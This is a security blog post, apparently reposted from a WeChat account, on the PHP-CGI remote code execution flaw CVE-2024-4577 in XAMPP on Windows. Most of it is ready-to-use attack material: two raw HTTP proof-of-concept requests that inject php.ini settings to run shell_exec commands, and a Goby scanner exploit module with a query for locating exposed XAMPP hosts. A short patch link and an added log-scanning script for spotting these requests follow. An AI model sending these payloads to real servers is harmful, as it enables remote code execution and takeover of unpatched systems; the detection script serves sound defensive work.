[Code Execution] PHP-CGI (CVE-2024-4577) [Goby PoC]

admin, 2024-06-08 19:23:35
 


Vulnerability description

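XAMPP aims to provide a simple, easy-to-use environment that lets users install and run these technologies on their own computers in order to develop and test web-based applications. A default installation runs PHP in CGI mode. In this mode the web server parses HTTP requests and passes them to PHP scripts, which then process them. For example, the query string is parsed and passed to the PHP interpreter on the command line, which leads to a code execution vulnerability.

Reproduction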

Vulnerable URL: *

Vulnerable parameter: *

Details:

1. Start your own service


2. Verify with the following PoC

PHP code: <?php echo shell_exec('whoami');?>


POC1:

POST /test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{host}}
User-Agent: curl/8.3.0
Accept: */*
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php
phpinfo();
?>

POC2:

POST /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{host}}
Content-Length: 34
Content-Type: text/html; charset=UTF-8
Content-Type: application/x-www-form-urlencoded
Redirect-Status: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

<?php echo shell_exec('whoami');?>

Goby detection exp:

package exploits

import (
  "git.gobies.org/goby/goscanner/goutils"
)

func init() {
  expJson := `{
  "Name": "PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)",
  "Description": "",
  "Product": "",
  "Homepage": "",
  "DisclosureDate": "2024-06-08",
  "PostTime": "2024-06-08",
  "Author": "[email protected]",
  "FofaQuery": "body=\"XAMPP for Windows\"",
  "GobyQuery": "body=\"XAMPP for Windows\"",
  "Level": "3",
  "Impact": "",
  "Recommendation": "",
  "References": [],
  "Is0day": false,
  "HasExp": false,
  "ExpParams": [],
  "ExpTips": {
    "Type": "",
    "Content": ""
  },
  "ScanSteps": [
    "OR",
    {
      "Request": {
        "method": "POST",
        "uri": "/php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input",
        "follow_redirect": true,
        "header": {
          "REDIRECT-STATUS": "1",
          "Content-type": "text/html; charset=UTF-8",
          "Content-Type": "application/x-www-form-urlencoded",
          "Content-Length": "21"
        },
        "data_type": "text",
        "data": "<?php echo shell_exec('dir');?>"
      },
      "ResponseTest": {
        "type": "group",
        "operation": "AND",
        "checks": [
          {
            "type": "item",
            "variable": "$code",
            "operation": "==",
            "value": "200",
            "bz": ""
          },
          {
            "type": "item",
            "variable": "$body",
            "operation": "contains",
            "value": "<DIR>",
            "bz": ""
          }
        ]
      },
      "SetVariable": []
    },
    {
      "Request": {
        "method": "POST",
        "uri": "/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input",
        "follow_redirect": true,
        "header": {},
        "data_type": "text",
        "data": "<?php\nphpinfo();\n?>"
      },
      "ResponseTest": {
        "type": "group",
        "operation": "AND",
        "checks": [
          {
            "type": "item",
            "variable": "$code",
            "operation": "==",
            "value": "200",
            "bz": ""
          },
          {
            "type": "item",
            "variable": "$body",
            "operation": "contains",
            "value": "phpinfo",
            "bz": ""
          }
        ]
      },
      "SetVariable": []
    }
  ],
  "ExploitSteps": [
    "AND",
    {
      "Request": {
        "method": "GET",
        "uri": "/test.php",
        "follow_redirect": true,
        "header": {},
        "data_type": "text",
        "data": ""
      },
      "ResponseTest": {
        "type": "group",
        "operation": "AND",
        "checks": [
          {
            "type": "item",
            "variable": "$code",
            "operation": "==",
            "value": "200",
            "bz": ""
          },
          {
            "type": "item",
            "variable": "$body",
            "operation": "contains",
            "value": "test",
            "bz": ""
          }
        ]
      },
      "SetVariable": []
    }
  ],
  "Tags": [],
  "VulType": [],
  "CVEIDs": [
    ""
  ],
  "CNNVD": [
    ""
  ],
  "CNVD": [
    ""
  ],
  "CVSSScore": "",
  "Translation": {
    "CN": {
      "Name": "PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)",
      "Product": "",
      "Description": "",
      "Recommendation": "",
      "Impact": "",
      "VulType": [],
      "Tags": []
    },
    "EN": {
      "Name": "PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)",
      "Product": "",
      "Description": "",
      "Recommendation": "",
      "Impact": "",
      "VulType": [],
      "Tags": []
    }
  },
  "AttackSurfaces": {
    "Application": null,
    "Support": null,
    "Service": null,
    "System": null,
    "Hardware": null
  },
  "PocGlobalParams": {},
  "ExpGlobalParams": {}
}`

  ExpManager.AddExploit(NewExploit(
    goutils.GetFileName(),
    expJson,
    nil,
    nil,
  ))
}
Remediation

Install the upgrade patch: https://www.php.net/downloads.php
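
A log check for the two PoC requests shown above, added here as an example (it is not code from the original post or from Goby): it scans Apache access-log lines for a query string whose arguments begin with byte 0xAD or a hyphen and reports the php.ini settings passed with them. The log entries are constructed samples, and the names `inspect_query` and `scan_log` are assumptions of this example.

```python
import re
from urllib.parse import unquote_to_bytes

# Request line inside an Apache common/combined access-log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# 0xAD (%AD or %ad) is what the PoC requests send where "-" would go.
DASH_BYTES = {0xAD: "0xAD", 0x2D: "0x2D"}
# php.ini settings the PoC requests pass through the injected "d" switch.
WATCHED = (b"allow_url_include", b"auto_prepend_file", b"php://input")

# Constructed sample entries (documentation addresses, made-up sizes).
SAMPLE_LOG = [
    '203.0.113.7 - - [08/Jun/2024:19:01:02 +0800] "POST /test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 81234',
    '203.0.113.7 - - [08/Jun/2024:19:01:09 +0800] "POST /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input HTTP/1.1" 200 412',
    '198.51.100.20 - - [08/Jun/2024:19:02:30 +0800] "GET /index.php?page=news&id=7 HTTP/1.1" 200 5120',
    '198.51.100.20 - - [08/Jun/2024:19:02:41 +0800] "GET /search.php?q=allow_url_include HTTP/1.1" 200 2048',
]

def inspect_query(raw_query):
    """Return (switches, settings) for a raw, still percent-encoded query."""
    # RFC 3875 section 4.4: only a query with no unencoded "=" is handed to
    # the CGI program as command-line arguments, split on "+".
    if not raw_query or "=" in raw_query:
        return [], []
    switches, settings = [], []
    for arg in raw_query.split("+"):
        decoded = unquote_to_bytes(arg)
        if decoded and decoded[0] in DASH_BYTES:
            switches.append(DASH_BYTES[decoded[0]] + ":" + decoded[1:].decode("latin-1"))
        settings += [w.decode() for w in WATCHED
                     if w in decoded.lower() and w.decode() not in settings]
    return switches, settings

def scan_log(lines):
    """Return (line number, path, switches, settings) per suspicious entry."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        path, _, query = match["target"].partition("?")
        switches, settings = inspect_query(query)
        if switches:
            findings.append((number, path, switches, settings))
    return findings

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The fourth sample entry mentions `allow_url_include` but carries an unencoded `=`, so it is not reported.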

 

Originally published on the WeChat official account 小羊安全屋: [Code Execution] PHP-CGI (CVE-2024-4577)
